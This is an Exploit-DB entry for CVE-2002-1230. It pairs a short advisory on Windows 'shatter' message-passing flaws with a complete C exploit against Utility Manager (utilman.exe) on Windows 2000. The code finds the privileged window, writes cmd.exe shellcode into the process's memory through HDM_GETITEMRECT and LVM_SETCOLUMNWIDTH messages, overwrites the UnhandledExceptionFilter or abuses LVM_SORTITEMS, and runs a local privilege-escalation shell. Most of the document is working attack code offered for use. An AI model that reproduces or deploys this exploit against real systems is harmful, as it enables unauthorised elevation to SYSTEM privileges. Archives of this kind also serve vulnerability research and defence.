Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (1)

EDB-ID:

21684

CVE:

2002-1230

EDB Verified:

Author:

sectroyer

Type:

local

Exploit:   /  

Platform:

Windows

Date:

2002-08-06

Vulnerable App: 
// source: https://www.securityfocus.com/bid/5408/info

A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely affects almost every Win32 window-based application. Attackers with local access may exploit this vulnerability to elevate privileges if a window belonging to another process with higher privileges is present. One example of such a process is antivirus software, which often must run with LocalSystem privileges.

** Microsoft has released a statement regarding this issue. Please see the References section for details.

A paper, entitled "Win32 Message Vulnerabilities Redux" has been published by iDEFENSE that describes another Windows message that may be abused in a similar manner to WM_TIMER. Microsoft has not released patches to address problems with this message. There are likely other messages which can be exploited in the same manner.

Another proof-of-concept has been released by Brett Moore in a paper entitled "Shattering SEH III". This paper demonstrates how Shatter attacks may be used against applications which make use of progress bar controls.

Brett Moore has released a paper entitled "Shattering By Example" which summarizes previous Shatter attacks, discusses new techniques and also provides an exploit which abuses Windows statusbars using WM_SETTEXT, SB_SETTEXT, SB_GETTEXTLENGTH, SB_SETPARTS and SB_GETPARTS messages. Please see the attached reference to the paper for more details.

//---------------------------UtlExp.c------------------------------
/******************************************************************
*sectroyer
*Random Intruders
*
*The exploit uses two shatter vulnerabilities to cause
*the execution of code. The first option isn't universal
*but two others should work with any Win2k with any 
*language(of course on condition, that you will set
*the correct main window title).
*
*sectroyer@go2.pl
*
*******************************************************************/
#include <stdio.h>
#include <windows.h>
#include <commctrl.h>
#define NOP 0x90
#define UEF long(__stdcall*)(_EXCEPTION_POINTERS*)
// Local Cmd Shellcode
unsigned char exec[]=
"\x55" // push ebp
"\x8b\xec" // mov ebp, esp
"\x33\xc0" // xor esi, esi
"\x50" // push esi
"\x68.exe" // push 'exe.'
"\x68 cmd" // push 'cmd '
"\x40" // inc esi
"\x50" // push esi
"\x8d\x45\xF5" // lea edi, [ebp-0xf]
"\x50" // push edi
"\xb8XXXX" // mov eax, XXXX -> 
WinExec()
"\xff\xd0" // call eax
"\x33\xf6" // xor esi,esi
"\x4e" // dec esi
"\x50" // push esi
"\xb8YYYY" // mov eax, YYYY -> 
ExitProcess()
"\xff\xd0" // call eax
"\x5d" // pop ebp
"\x5d" // pop ebp
"\x5d" // pop ebp
"\x5d" // pop ebp
"\xC3"; // ret
unsigned char buf[2048];
long hLVControl,hHdrControl,t=0;
char *tWindow;
char tWindowEn[]="Utility Manager";// The name of the main window
char tWindowPl[]="Mened?er narz?dzi";// The name of the main window
long sehHandler = 0x12345678; // Critical Address To Overwrite
long shellcodeaddr = 0x7FFDE060; // Known Writeable Space Or 
Global Space
long FindUnhandledExceptionFilter();
void doWrite(long tByte,long address);
void IterateWindows(long hWnd);
int main(int argc, char *argv[])
{
long hWnd;
HMODULE hMod;
DWORD ProcAddr;
printf("Utility Manager Exploit written by sectroyer 
<sectroyer@go2.pl>\n");
printf("Usage: %s <language> <option>\n", argv[0]);
printf("Languages:\n<0> Engilish\n<1> Polish\n");
printf("Options:\n");
printf("<0> LVM_SORTITEMS Vulnerability\n");
printf("<1> HDM_GETITEMRECT using UnhandledExcpetionFilter\n");
printf("<2> HDM_GETITEMRECT using LVM_SORTITEMS 
Vulnerability\n");
if(argc!=3)
return 0;
if(atoi(argv[2])<0||atoi(argv[2])>2)
return 0;
if(atoi(argv[1])<0||atoi(argv[1])>1)
return 0;
if(!atoi(argv[1]))
tWindow=tWindowEn;
else
tWindow=tWindowPl;
// Find local procedure address
t=atoi(argv[2]);
PROCESS_INFORMATION pi;
STARTUPINFO si={sizeof(STARTUPINFO)};
CreateProcessA
(NULL,"utilman.exe /start",NULL,NULL,NULL,NULL,NULL,NULL,&si,&pi);
Sleep(1000);
hMod = LoadLibrary("kernel32.dll");
*(long*)&exec[(int)(strstr((char*)exec,"XXXX")-exec)]=(long)
GetProcAddress(hMod,"WinExec");
*(long*)&exec[(int)(strstr((char*)exec,"YYYY")-exec)]=(long)
GetProcAddress(hMod,"ExitProcess");
printf("[+] Finding %s Window...\n",tWindow);
hWnd = (long)FindWindow(NULL,tWindow);
if(hWnd == NULL)
{
printf("[-] Couldn't Find %s Window\n",tWindow);
return 0;
}
printf("[+] Found Main Window At...0x%xh\n",hWnd);
IterateWindows(hWnd);
printf("[-] Not Done...\n");
return 0;
}
void doWrite(long tByte,long address)
{
SendMessage((HWND) hLVControl,(UINT) LVM_SETCOLUMNWIDTH,
0,MAKELPARAM(tByte, 0));
SendMessage((HWND) hHdrControl,(UINT) HDM_GETITEMRECT,1,address);
}
long FindUnhandledExceptionFilter()
{
long *pos;
void *hLib;
hLib=LoadLibraryA("kernel32.dll");
pos = (long*)hLib;
SetUnhandledExceptionFilter((UEF)0xA1A2A3A4);
__try
{
while(1)
{
if(*pos==0xA1A2A3A4)
{
SetUnhandledExceptionFilter((UEF)0xB4B3B2B1);
if(*pos==0xB4B3B2B1)
{
SetUnhandledExceptionFilter((UEF)0xFADEFADE);
if(*pos==0xFADEFADE)
break;
}
}
pos++;
}
}
__except(1)
{
return NULL;
}
return (long)pos;
}
void IterateWindows(long hWnd)
{
long childhWnd,looper;
childhWnd = (long)GetNextWindow((void*)hWnd,GW_CHILD);
while (childhWnd != NULL)
{
IterateWindows(childhWnd);
childhWnd = (long)GetNextWindow((void*)
childhWnd ,GW_HWNDNEXT);
}
hLVControl = hWnd;
hHdrControl = SendMessage((HWND) hLVControl,(UINT) 
LVM_GETHEADER, 0,0);
if(hHdrControl != NULL)
{
// Found a Listview Window with a Header
printf("[+] Found listview window..0x%xh\n",hLVControl);
if(t!=0)
{
printf("[+] Found lvheader window..0x%xh\n",hHdrControl);
// Inject shellcode to known address
printf("[+] Sending shellcode to...0x%xh\n",shellcodeaddr);
for (looper=0;looper<sizeof(exec);looper++)
doWrite((long) exec[looper],(shellcodeaddr + looper));
// Overwrite SEH
printf("[+] Finding UnhandledExceptionFilter....\n");
sehHandler=FindUnhandledExceptionFilter();
printf("[+] Overwriting Top SEH....0x%xh\n",sehHandler);
doWrite(((shellcodeaddr) & 0xff),sehHandler);
doWrite(((shellcodeaddr >> 8) & 0xff),sehHandler+1);
doWrite(((shellcodeaddr >> 16) & 0xff),sehHandler+2);
doWrite(((shellcodeaddr >> 24) & 0xff),sehHandler+3);
}
if(t==0)
{
printf("[+] LVM_SORTITEMS Vulnerability\n");
COPYDATASTRUCT cds;
memset(buf,NOP,sizeof(buf));
memcpy(buf+700,exec,sizeof(exec)-1);
cds.cbData=1000;
cds.dwData=0;
cds.lpData=buf;
SendMessage((void*)hWnd, WM_COPYDATA, (WPARAM)hWnd, 
(LPARAM)&cds);
SendMessage( (PVOID)hLVControl, LVM_SORTITEMS, 1, 
0x007efd04);
printf("[+] Done...\n");
}
else if(t==1)
{
printf("[+] HDM_GETITEMRECT Using 
UnhandledExceptionFilter\n");
SendMessage((HWND) hHdrControl,(UINT) HDM_GETITEMRECT,0,1);
printf("[+] Done...\n");
}
else if(t==2)
{
printf("[+] HDM_GETITEMRECT Using LVM_SORTITEMS 
Vulnerability\n");
SendMessage((HWND) hLVControl,(UINT) 
LVM_SORTITEMS,1,shellcodeaddr);
printf("[+] Done...\n");
}
exit(0);
}
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services